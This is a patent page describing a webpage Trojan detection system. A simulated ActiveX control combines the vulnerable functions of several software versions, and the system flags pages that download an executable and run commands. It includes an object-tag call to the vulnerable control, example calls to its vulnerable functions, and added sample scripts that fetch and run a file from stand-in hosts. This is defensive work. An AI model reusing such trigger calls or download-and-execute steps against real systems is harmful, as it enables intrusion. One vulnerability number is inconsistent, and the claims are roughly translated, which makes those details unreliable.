CN102446253B - Webpage trojan detection method and system - Google Patents

Publication number
CN102446253B
Authority
CN
China
Prior art keywords
webpage
activex control
simulation
script
classid
Legal status
Active
Application number
CN201110439572.6A
Other languages
Chinese (zh)
Other versions
CN102446253A (en
Inventor
宋申雷
刘起
Current Assignee
360 Digital Security Technology Group Co Ltd
Original Assignee
Beijing Qihoo Technology Co Ltd

Abstract

The invention discloses a webpage Trojan detection method and system applied in a webpage Trojan detection environment. An ActiveX control is simulated; the different vulnerable functions that exist in different versions of the same third-party software are integrated into the simulated ActiveX control; the classid of the simulated ActiveX control is set to the classid shared by the ActiveX controls of the different versions of the third-party software; and the simulated ActiveX control is installed in the webpage Trojan detection environment. The method comprises the following steps: receiving a message, sent by a script running in a web page to the simulated ActiveX control through the classid, that calls a vulnerable function; returning the corresponding vulnerable function that exists in the simulated ActiveX control to the script running in the web page; and monitoring the behavior of the script to determine whether a Trojan exists in the web page. The invention makes the webpage Trojan detection environment compatible with the vulnerabilities of multiple versions of the same software and improves the accuracy and extensibility of webpage Trojan detection.

Description

A webpage Trojan detection method and system
Technical field
The present invention relates to the field of network security technology, and in particular to a webpage Trojan detection method and system.
Background
A webpage Trojan is an attack technique commonly used by hackers; it usually exploits vulnerabilities in third-party software to attack the operating system. By cause, such attacks fall into two kinds: those caused by the browser itself and those caused by ActiveX controls. The first kind directly exploits vulnerabilities in the browser itself to carry out the attack. The second kind uses the browser indirectly to attack the user's system, mainly by exploiting vulnerabilities in other third-party software. In the "MPC" webpage Trojan, for example, the vulnerable target is not the browser itself but the third-party software "MPC". This means that a user's system can be attacked by this webpage Trojan only if "MPC" is installed on it. When the browser visits a page carrying such a Trojan, the Object object in the page code causes the browser to automatically invoke the other, vulnerable software. The vulnerability is then triggered, the webpage Trojan takes control of the browser's execution flow, and malicious shellcode is executed next.
To detect whether a web page contains a Trojan, a webpage Trojan detection environment can be built. This detection environment is a system running in the cloud that automatically visits web pages on the Internet and determines which of them contain Trojans. The precondition is that the vulnerabilities of the third-party software are known; the environment detects whether a page contains a Trojan that attacks these known vulnerabilities.
When detecting webpage Trojans, the detection environment usually uses behavior-based detection, that is, it decides whether a page contains a Trojan from the concrete behavior observed while the page runs. Therefore, to decide whether a page contains a Trojan that attacks a vulnerability in a particular third-party software, that software must be installed in the detection environment so that the page can call the vulnerable function and trigger the attack. Whether the page contains a Trojan that attacks the vulnerability of this software is then determined by checking whether the vulnerable function is called.
However, the same third-party software may exist in several versions, different versions may have different vulnerabilities, and a hacker may combine attacks on the vulnerabilities of several versions; in other words, one web page may attack several vulnerabilities of different versions of the same software. If the detection environment contains the software vulnerability of only one version, it cannot cover all of the vulnerabilities. If the environment contains the vulnerability of a higher version while the attacker targets the vulnerability of a lower version, or the environment contains the vulnerability of a lower version while the attack targets a higher version, the Trojan in the page ultimately cannot be detected correctly, and missed detections or false detections occur.
If several different versions of the same third-party software could exist in the detection environment at the same time, such combined attacks could be detected and missed or false detections prevented. However, just as several versions of the same software cannot be installed directly on one computer, they cannot be installed together in one detection environment either. The alternative is to create several different webpage Trojan detection environments, install a different version of the software in each, and then detect the webpage Trojans that attack each version separately. This obviously increases the hardware resource consumption of the detection environment considerably and makes the detection process more complicated.
Summary of the invention
The invention provides a webpage Trojan detection method and system that make the webpage Trojan detection environment compatible with the vulnerabilities of multiple versions of the same software and improve the accuracy and extensibility of webpage Trojan detection.
The invention provides the following scheme:
A webpage Trojan detection method, applied in a webpage Trojan detection environment, in which an ActiveX control is simulated, the different vulnerable functions that exist in different versions of the same third-party software are integrated into the simulated ActiveX control, the classid of the simulated ActiveX control is set to the classid shared by the ActiveX controls of the different versions of the third-party software, and the simulated ActiveX control is installed in the webpage Trojan detection environment; the method comprises:
receiving a message, sent by a script running in a web page to the simulated ActiveX control through the classid, that calls a vulnerable function;
returning the corresponding vulnerable function that exists in the simulated ActiveX control to the script running in the web page;
monitoring the behavior of the script to determine whether a Trojan exists in the web page.
Wherein receiving the message that calls a vulnerable function, sent by the script running in the web page to the simulated ActiveX control through the classid, comprises:
receiving a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls a vulnerable function existing in one version of the third-party software.
Wherein receiving the message that calls a vulnerable function, sent by the script running in the web page to the simulated ActiveX control through the classid, comprises:
receiving a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls vulnerable functions existing in at least two versions of the third-party software.
Wherein monitoring the behavior of the script to determine whether a Trojan exists in the web page comprises:
detecting whether the script running in the web page actively downloads a Trojan file and runs malicious commands;
if so, a Trojan exists in the web page.
Wherein the uniform resource locator (URL) of the downloaded file is analyzed, and whether the downloaded file is a Trojan file is judged by determining whether the URL contains the suffix of an executable file format.
Wherein the third-party software is software that enhances browser functionality through an ActiveX control.
A webpage Trojan detection system, applied in a webpage Trojan detection environment, in which an ActiveX control is simulated, the different vulnerable functions that exist in different versions of the same third-party software are integrated into the simulated ActiveX control, the classid of the simulated ActiveX control is set to the classid shared by the ActiveX controls of the different versions of the third-party software, and the simulated ActiveX control is installed in the webpage Trojan detection environment; the system comprises:
a call request receiving unit, configured to receive a message, sent by a script running in a web page to the simulated ActiveX control through the classid, that calls a vulnerable function;
a function returning unit, configured to return the corresponding vulnerable function that exists in the simulated ActiveX control to the script running in the web page;
a monitoring unit, configured to monitor the behavior of the script to determine whether a Trojan exists in the web page.
Wherein the call request receiving unit comprises:
a first receiving subunit, configured to receive a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls a vulnerable function existing in one version of the third-party software.
Wherein the call request receiving unit comprises:
a second receiving subunit, configured to receive a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls vulnerable functions existing in at least two versions of the third-party software.
Wherein the monitoring unit comprises:
a detection subunit, configured to detect whether the script running in the web page actively downloads a Trojan file and runs malicious commands;
a determining subunit, configured to determine, if so, that a Trojan exists in the web page.
Wherein the detection subunit analyzes the uniform resource locator (URL) of the downloaded file and judges whether the downloaded file is a Trojan file by determining whether the URL contains the suffix of an executable file format.
Wherein the third-party software is software that enhances browser functionality through an ActiveX control.
According to the specific embodiments provided by the invention, the invention achieves the following technical effects:
Because the vulnerable functions of multiple versions of the same third-party software are simulated in a single ActiveX control, the webpage Trojan detection environment is compatible with the vulnerabilities of multiple versions of the same software. Trojans in web pages are therefore detected more comprehensively, the accuracy and extensibility of webpage Trojan detection are improved, the probability of missed detections is reduced, and hardware resources in the detection environment are not wasted.
Brief description of the drawings
To illustrate the technical solutions of the embodiments of the present invention or of the prior art more clearly, the drawings used in the embodiments are briefly described below. The drawings described below are only some embodiments of the invention; a person of ordinary skill in the art can derive other drawings from them without creative effort.
Fig. 1 is a flowchart of the method provided by the embodiment of the present invention;
Fig. 2 is a schematic diagram of the device provided by the embodiment of the present invention.
Detailed description
The technical solutions in the embodiments of the present invention are described clearly and completely below with reference to the drawings. The described embodiments are obviously only some of the embodiments of the invention, not all of them. All other embodiments obtained by a person of ordinary skill in the art on the basis of these embodiments fall within the scope of protection of the invention.
It should first be noted that a webpage Trojan normally attacks the user's system by having a script in the web page execute malicious code, and web pages are generally opened in a browser. Therefore, if a webpage Trojan is to attack a vulnerability in third-party software other than the browser, the page must be able to call the functions of that third-party software through the browser.
ActiveX controls, for their part, are code that enhances the functionality of web pages. For example, for a web page to call a download tool such as Xunlei (Thunder) to download a file, the corresponding ActiveX control must first be installed; only then can the page call the download tool through this ActiveX control and use it to complete the download. Calling third-party software outside the browser directly from a web page therefore requires an ActiveX control. In other words, it is the existence of ActiveX controls that lets a web page opened in the browser call third-party software, and that in turn makes it possible for a webpage Trojan to call the vulnerable functions in that software. ActiveX controls allow a web page to produce richer effects through the interaction of scripts and controls, but they may also introduce security problems. The third-party software described in the embodiments of the present invention can therefore be understood as software that enhances browser functionality through an ActiveX control.
In short, third-party software comes under attack from webpage Trojans because it contains vulnerabilities: the Object object in the page code can make the browser automatically invoke other, vulnerable third-party software. The vulnerability is then triggered, the webpage Trojan takes control of the browser's execution flow, and malicious shellcode is executed next. However, not every vulnerability in third-party software can be used for a webpage Trojan; software that has nothing to do with the browser generally does not become the target of a webpage Trojan. Only when the ActiveX control of a third-party software has a vulnerability can it be exploited by a webpage Trojan.
In the webpage Trojan detection method provided by the embodiment of the present invention, the ActiveX control is the starting point for making the detection environment compatible with different versions of the same software. In a specific implementation, for a given third-party software, all versions commonly used by users are first identified and the vulnerable functions in each version are found. The vulnerable functions of each version are then simulated, ensuring that the simulated software does not differ from the original software in how the vulnerability is triggered. The simulated vulnerable functions of all versions are then integrated into one ActiveX control, and this simulated ActiveX control is installed in the webpage Trojan detection environment. This guarantees that whichever version of the software a webpage Trojan attacks, the vulnerability can be triggered and the Trojan can then be detected from its concrete behavior.
For example, a stack overflow vulnerability is known in the OnBeforeVideoDownload() function of the ActiveX control of one version of a music player (because it is a known vulnerability, it is normally recorded in the China National Vulnerability Database of Information Security (CNNVD); suppose its CNNVD number is CNNVD-200709-127), and a remote stack overflow vulnerability exists in the rawParse() function of the ActiveX control of another version (suppose its CNNVD number is CNNVD-200905-130). Both are security vulnerabilities in the ActiveX control mps.dll, but they are separated by a long software update cycle (for example, two years) and by several versions. In an ordinary webpage Trojan detection environment only one version of this music player can be installed. Once the version with the CNNVD-200905-130 vulnerability is installed, the environment can detect only webpage Trojans that attack the CNNVD-200905-130 vulnerability and cannot also detect webpage Trojans that attack the CNNVD-200905-127 vulnerability.
In the embodiment of the present invention, by contrast, the two vulnerabilities CNNVD-200905-130 and CNNVD-200905-127 can be simulated in the same mps.dll control, together with the classid "6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" of the original ActiveX control (the ActiveX controls of different versions of the same third-party software have the same classid). A webpage Trojan that calls vulnerable functions in different software through different controls distinguishes the controls by classid; that is, if a webpage Trojan wants to call a vulnerable function through control A, it writes the classid of that control in the call request. Therefore, if the control simulated by the embodiment also reproduces the original classid, a web page can call the simulated ActiveX control through an Object tag. For example, the simulated ActiveX control can be called with the following statement:
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
In addition, the vulnerable code of the OnBeforeVideoDownload function and the rawParse function, which occur in the two vulnerabilities respectively, must be simulated in the ActiveX control, so that a script in the web page can call both the rawParse function (target.rawParse(buffer)) and the OnBeforeVideoDownload function (target.OnBeforeVideoDownload(buffer)).
In short, the classid of the original software's ActiveX control must be reproduced so that a web page can call the simulated ActiveX control, and the simulated vulnerable functions of the multiple versions must be integrated into that control so that a web page can call the vulnerable function of any version. The runtime behavior of the script is then monitored to judge whether the page contains a Trojan.
After the above preparation, the simulated ActiveX control can be installed in the webpage Trojan detection environment. The embodiment of the present invention also provides a webpage Trojan detection method; specifically, referring to Fig. 1, webpage Trojan detection can comprise the following steps:
S101: receive a message, sent by a script running in the web page to the simulated ActiveX control through the classid, that calls a vulnerable function;
Because the classid of the simulated ActiveX control is set to the classid shared by the ActiveX controls of the different versions of the third-party software, a script in the web page can use this classid to call the vulnerable functions integrated in the simulated ActiveX control.
A Trojan in a web page may attack the vulnerable function of only one version, or it may combine attacks on different vulnerable functions of several versions. The call request may therefore call a vulnerable function of one version or vulnerable functions of several versions.
S102: return the corresponding vulnerable function that exists in the simulated ActiveX control to the script running in the web page;
Different vulnerable functions have different names, and a script in the web page supplies the respective function name when it calls each function. The function name in the call request therefore shows directly which function or functions the script needs to call, and the corresponding function is returned to the script running in the web page.
S103: monitor the behavior of the script to determine whether a Trojan exists in the web page.
After the vulnerable function has been returned to the script running in the web page, the Trojan's attack is triggered if the page really contains a Trojan. Continuing to monitor the behavior of the script therefore determines whether a Trojan is present. As for the behavior monitoring itself: when a browser visits a normal web page, it generally does not automatically download an executable file (PE file for short) or run suspicious commands, whereas the typical malicious behavior of a webpage Trojan is to download a Trojan file and run it locally. Monitoring these two behaviors is therefore enough to identify a webpage Trojan. Specifically, the following steps can be used. First, detect whether the script running in the web page downloads a Trojan file: analyze the URL (Uniform/Universal Resource Locator) of the downloaded file to see whether it contains the suffix of a typical PE file format, judge whether the file format is PE, and exclude some normal PE download cases. Then, detect whether the script running in the web page runs malicious commands, which can be done by checking the path and command parameters of the executable files that the browser executes. If both kinds of behavior occur, the web page can be judged to contain a Trojan.
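Steps S101 to S103 above, as an added Python sketch that is not code from the patent: one simulated control is registered under the mps.dll classid with both vulnerable function names, script calls are dispatched by name, and the download and command checks produce the verdict. The class and method names, the suffix list, the allow-listed host, the event trace and the rule that a command is suspicious when it launches a just-downloaded file are all assumptions made for illustration.

```python
import ntpath
from dataclasses import dataclass, field
from urllib.parse import unquote, urlsplit

MPS_CLASSID = "6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB"  # classid quoted in the description
# Function name -> vulnerability it simulates (numbers as first given in the description).
MPS_FUNCTIONS = {
    "OnBeforeVideoDownload": "CNNVD-200709-127",
    "rawParse": "CNNVD-200905-130",
}
PE_SUFFIXES = (".exe", ".scr", ".com", ".dll")     # assumption: suffixes treated as PE files
ALLOWED_DOWNLOAD_HOSTS = {"updates.example.com"}   # constructed: known-normal PE download host


def normalize_classid(value):
    """Reduce 'clsid:{GUID}' as written in an <object> tag to a bare upper-case GUID."""
    value = value.strip()
    if value.lower().startswith("clsid:"):
        value = value[len("clsid:"):]
    return value.strip("{}").upper()


@dataclass
class DetectionEnvironment:
    """Hypothetical model of the environment: simulated controls plus a behavior log."""
    controls: dict = field(default_factory=dict)   # classid -> {function name: vulnerability}
    calls: list = field(default_factory=list)
    downloads: list = field(default_factory=list)
    commands: list = field(default_factory=list)

    def install(self, classid, functions):
        self.controls[normalize_classid(classid)] = dict(functions)

    def call(self, classid, function, argument):
        """S101/S102: find the simulated control by classid, dispatch by function name."""
        functions = self.controls.get(normalize_classid(classid))
        if functions is None or function not in functions:
            return None                            # unknown control or method: nothing triggered
        self.calls.append((function, functions[function], len(argument)))
        return functions[function]

    def on_download(self, url):
        self.downloads.append(url)

    def on_command(self, path, args=""):
        self.commands.append((path, args))

    def suspicious_downloads(self):
        """S103, check 1: URL path ends in a PE suffix and the host is not a normal source."""
        hits = []
        for url in self.downloads:
            parts = urlsplit(url)
            path = unquote(parts.path).lower()     # the query string is not part of the path
            if path.endswith(PE_SUFFIXES) and parts.hostname not in ALLOWED_DOWNLOAD_HOSTS:
                hits.append(url)
        return hits

    def suspicious_commands(self):
        """S103, check 2 (assumed rule): the browser launches a file it has just downloaded."""
        names = {ntpath.basename(unquote(urlsplit(u).path)).lower()
                 for u in self.suspicious_downloads()}
        return [(p, a) for p, a in self.commands if ntpath.basename(p).lower() in names]

    def verdict(self):
        """Flag the page when both behaviors occur; list which simulated bugs were called."""
        triggered = sorted({vuln for _, vuln, _ in self.calls})
        malicious = bool(self.suspicious_downloads()) and bool(self.suspicious_commands())
        return {"malicious": malicious, "triggered": triggered}


def run_constructed_sample():
    """Constructed trace of a page that calls the vulnerable functions of both versions."""
    env = DetectionEnvironment()
    env.install(MPS_CLASSID, MPS_FUNCTIONS)
    env.call("clsid:6be52e1d-e586-474f-a6e2-1a85a9b4d9fb", "rawParse", "A" * 4096)
    env.call("clsid:" + MPS_CLASSID, "OnBeforeVideoDownload", "A" * 4096)
    env.on_download("http://files.example.net/img/svc.exe?id=7")
    env.on_command(r"C:\Users\test\AppData\Local\Temp\svc.exe", "/q")
    return env.verdict()


if __name__ == "__main__":
    print(run_constructed_sample())
```

A suffix test on the URL path alone misses downloads whose file name appears only in the query string or in response headers, so a real monitor would pair it with inspection of the downloaded content.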
In short, because the embodiment of the present invention simulates the vulnerable functions of multiple versions of the same third-party software in a single ActiveX control, the webpage Trojan detection environment is compatible with the vulnerabilities of multiple versions of the same software. Trojans in web pages are therefore detected more comprehensively, the accuracy and extensibility of webpage Trojan detection are improved, the probability of missed detections is reduced, and hardware resources in the detection environment are not wasted.
Corresponding to the webpage Trojan detection method provided by the embodiment of the present invention, the embodiment also provides a webpage Trojan detection system. The system is applied in a webpage Trojan detection environment. In a specific implementation, an ActiveX control can be simulated, the different vulnerable functions that exist in different versions of the same third-party software are integrated into the simulated ActiveX control, the classid of the simulated ActiveX control is set to the classid shared by the ActiveX controls of the different versions of the third-party software, and the simulated ActiveX control is installed in the webpage Trojan detection environment. Referring to Fig. 2, the system comprises:
a call request receiving unit 201, configured to receive a message, sent by a script running in a web page to the simulated ActiveX control through the classid, that calls a vulnerable function;
a function returning unit 202, configured to return the corresponding vulnerable function that exists in the simulated ActiveX control to the script running in the web page;
a monitoring unit 203, configured to monitor the behavior of the script to determine whether a Trojan exists in the web page.
The call request receiving unit 201 can comprise:
a first receiving subunit, configured to receive a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls a vulnerable function existing in one version of the third-party software.
Alternatively, the call request receiving unit 201 can comprise:
a second receiving subunit, configured to receive a message, sent by the script running in the web page to the simulated ActiveX control through the classid, that calls vulnerable functions existing in at least two versions of the third-party software.
In a specific implementation, the monitoring unit 203 can comprise:
a detection subunit, configured to detect whether the script running in the web page actively downloads a Trojan file and runs malicious commands;
a determining subunit, configured to determine, if so, that a Trojan exists in the web page.
The detection subunit can analyze the uniform resource locator (URL) of the downloaded file and judge whether the downloaded file is a Trojan file by determining whether the URL contains the suffix of an executable file format.
The third-party software is software that enhances browser functionality through an ActiveX control.
In short, because the webpage Trojan detection system provided by the embodiment of the present invention simulates the vulnerable functions of multiple versions of the same third-party software in a single ActiveX control, the webpage Trojan detection environment is compatible with the vulnerabilities of multiple versions of the same software. Trojans in web pages are therefore detected more comprehensively, the accuracy and extensibility of webpage Trojan detection are improved, the probability of missed detections is reduced, and hardware resources in the detection environment are not wasted.
From the above description of the embodiments, those skilled in the art can clearly understand that the invention can be implemented by software plus a necessary general-purpose hardware platform. Based on this understanding, the essence of the technical solution of the invention, or the part that contributes over the prior art, can be embodied in the form of a software product. The computer software product can be stored in a storage medium such as ROM/RAM, a magnetic disk or an optical disc, and includes instructions that cause a computer device (which may be a personal computer, a server, a network device or the like) to perform the methods described in the embodiments of the invention or in certain parts of the embodiments.
The embodiments in this specification are described progressively; for parts that are the same or similar, the embodiments can be referred to one another, and each embodiment emphasizes its differences from the others. In particular, because the device and system embodiments are substantially similar to the method embodiment, they are described more briefly, and the relevant parts can be found in the description of the method embodiment. The device and system embodiments described above are only schematic. The units described as separate components may or may not be physically separate, and the components shown as units may or may not be physical units; they may be located in one place or distributed over several network elements. Some or all of the modules can be selected according to actual needs to achieve the purpose of the scheme of this embodiment. A person of ordinary skill in the art can understand and implement it without creative effort.
The webpage Trojan detection method and system provided by the present invention have been described in detail above. Specific examples are used herein to set out the principle and embodiments of the invention, and the description of the embodiments is intended only to help in understanding the method of the invention and its core idea. A person of ordinary skill in the art may, following the idea of the invention, make changes to the specific embodiments and the scope of application. In summary, this description should not be construed as limiting the invention.

Claims (12)

1. a Web page wooden horse detecting method, be applied in webpage Trojan horse testing environment, it is characterized in that, for third party software simulation ActiveX control, and simulate different leak functions for the described third party software of different editions, the different leak functions that exist in the different editions of described third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment, described method comprises:
The message of the leak function calling that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid;
The corresponding leak function of the existence in the ActiveX control of described simulation is returned to the script moving in described webpage; Monitor the behavior of described script, to determine in described webpage whether have wooden horse.
2. The method according to claim 1, characterized in that receiving the message calling a vulnerable function, sent by the script running in the webpage to the simulated ActiveX control through the classid, comprises:
receiving a message, sent by the script running in the webpage to the simulated ActiveX control through the classid, that calls a vulnerable function existing in one particular version of the third-party software.
3. The method according to claim 1, characterized in that receiving the message calling a vulnerable function, sent by the script running in the webpage to the simulated ActiveX control through the classid, comprises:
receiving a message, sent by the script running in the webpage to the simulated ActiveX control through the classid, that calls vulnerable functions existing in at least two versions of the third-party software.
4. The method according to claim 1, characterized in that monitoring the behavior of the script to determine whether a Trojan exists in the webpage comprises:
detecting whether the script running in the webpage actively downloads a Trojan file and runs malicious commands;
if so, a Trojan exists in the webpage.
5. The method according to claim 4, characterized in that whether the downloaded file is a Trojan file is judged by analyzing the uniform resource locator (URL) of the downloaded file and judging whether the URL contains the suffix of an executable file format.
6. The method according to any one of claims 1 to 5, characterized in that the third-party software is software that enhances browser functionality through an ActiveX control.
7. A webpage Trojan detection system, applied in a webpage Trojan detection environment, characterized in that an ActiveX control is simulated for third-party software, and different vulnerable functions are simulated for different versions of the third-party software; the different vulnerable functions existing in the different versions of the third-party software are integrated into the simulated ActiveX control; the classid of the simulated ActiveX control is set to be identical to the common classid shared by the ActiveX controls of the different versions of the third-party software; and the simulated ActiveX control is installed in the webpage Trojan detection environment; the system comprises:
a call request receiving unit, configured to receive a message, sent by a script running in a webpage to the simulated ActiveX control through the classid, that calls a vulnerable function;
a function returning unit, configured to return the corresponding vulnerable function existing in the simulated ActiveX control to the script running in the webpage;
a monitoring unit, configured to monitor the behavior of the script to determine whether a Trojan exists in the webpage.
8. The system according to claim 7, characterized in that the call request receiving unit comprises:
a first receiving subunit, configured to receive a message, sent by the script running in the webpage to the simulated ActiveX control through the classid, that calls a vulnerable function existing in one particular version of the third-party software.
9. The system according to claim 7, characterized in that the call request receiving unit comprises:
a second receiving subunit, configured to receive a message, sent by the script running in the webpage to the simulated ActiveX control through the classid, that calls vulnerable functions existing in at least two versions of the third-party software.
10. The system according to claim 7, characterized in that the monitoring unit comprises:
a detection subunit, configured to detect whether the script running in the webpage actively downloads a Trojan file and runs malicious commands;
a determining subunit, configured to determine, if so, that a Trojan exists in the webpage.
11. The system according to claim 10, characterized in that the detection subunit judges whether the downloaded file is a Trojan file by analyzing the uniform resource locator (URL) of the downloaded file and judging whether the URL contains the suffix of an executable file format.
12. The system according to any one of claims 7 to 11, characterized in that the third-party software is software that enhances browser functionality through an ActiveX control.
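The mechanism of claims 1, 3, 4 and 5, shown as an added example that is not part of the patent text: one simulated control registered under a single classid merges the vulnerable functions of two versions, logs every call a page script makes, and flags the page when an executable-suffix download is combined with a command execution. The classid, version labels, method names (`DownloadFile`, `RunCommand`), suffix list and URLs are all constructed for illustration, and reading "suffix" as "the URL path ends with it" is an assumption.

```javascript
// Constructed for illustration: classid, version labels, method names and URLs.
const CLASSID = 'clsid:00000000-0000-0000-0000-000000000001';
const EXEC_SUFFIXES = ['.exe', '.scr', '.com', '.bat', '.dll'];

// Build one simulated control whose stubs merge the vulnerable functions of
// several versions. Stubs only record the call; nothing is fetched or run.
function makeSimulatedControl(versions, log) {
  const control = {};
  for (const [version, methods] of Object.entries(versions)) {
    for (const [name, kind] of Object.entries(methods)) {
      control[name] = (...args) => { log.push({ version, name, kind, args }); return 0; };
    }
  }
  return control;
}

// Claim 5 check (assumption: "suffix" means the URL path ends with it).
function hasExecutableSuffix(rawUrl) {
  let path;
  try { path = new URL(String(rawUrl)).pathname.toLowerCase(); } catch { return false; }
  return EXEC_SUFFIXES.some((suffix) => path.endsWith(suffix));
}

// Claim 4 verdict: an executable-suffix download plus a command execution.
function verdict(log) {
  const downloaded = log.some((e) => e.kind === 'download' && hasExecutableSuffix(e.args[0]));
  const executed = log.some((e) => e.kind === 'execute');
  return { trojan: downloaded && executed, versionsProbed: [...new Set(log.map((e) => e.version))] };
}

// Run a page script against the classid registry and return the verdict.
function analyze(pageScript) {
  const log = [];
  const registry = { [CLASSID]: makeSimulatedControl({
    '1.0': { DownloadFile: 'download' }, // flaw present only in version 1.0
    '2.0': { RunCommand: 'execute' },    // flaw present only in version 2.0
  }, log) };
  pageScript((classid) => registry[String(classid).toLowerCase()] || null);
  return verdict(log);
}

// Constructed sample page scripts.
const suspiciousPage = (getControl) => {
  const c = getControl(CLASSID);
  c.DownloadFile('http://example.invalid/a/update.exe?v=1');
  c.RunCommand('update.exe');
};
const benignPage = (getControl) => getControl(CLASSID).DownloadFile('http://example.invalid/logo.png');
```

Because both version-specific stubs sit behind the same classid, a script that targets either version, or both as in claim 3, is observed in a single detection environment; `versionsProbed` records which versions' functions were called.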
CN201110439572.6A 2011-12-23 2011-12-23 Webpage trojan detection method and system Active CN102446253B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201110439572.6A CN102446253B (en) 2011-12-23 2011-12-23 Webpage trojan detection method and system

Publications (2)

Publication Number Publication Date
CN102446253A (en) 2012-05-09
CN102446253B (en) 2014-12-10

Family

ID=46008744

Country Status (1)

Country Link
CN (1) CN102446253B (en)

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
C14 Grant of patent or utility model
GR01 Patent grant
TR01 Transfer of patent right

Effective date of registration: 20220323

Address after: 100016 1773, 15 / F, 17 / F, building 3, No.10, Jiuxianqiao Road, Chaoyang District, Beijing

Patentee after: 360 Digital Security Technology Group Co., Ltd.

Address before: 100088 room 112, block D, 28 new street, new street, Xicheng District, Beijing (Desheng Park)

Patentee before: BEIJING QIHOO TECHNOLOGY Co.,Ltd.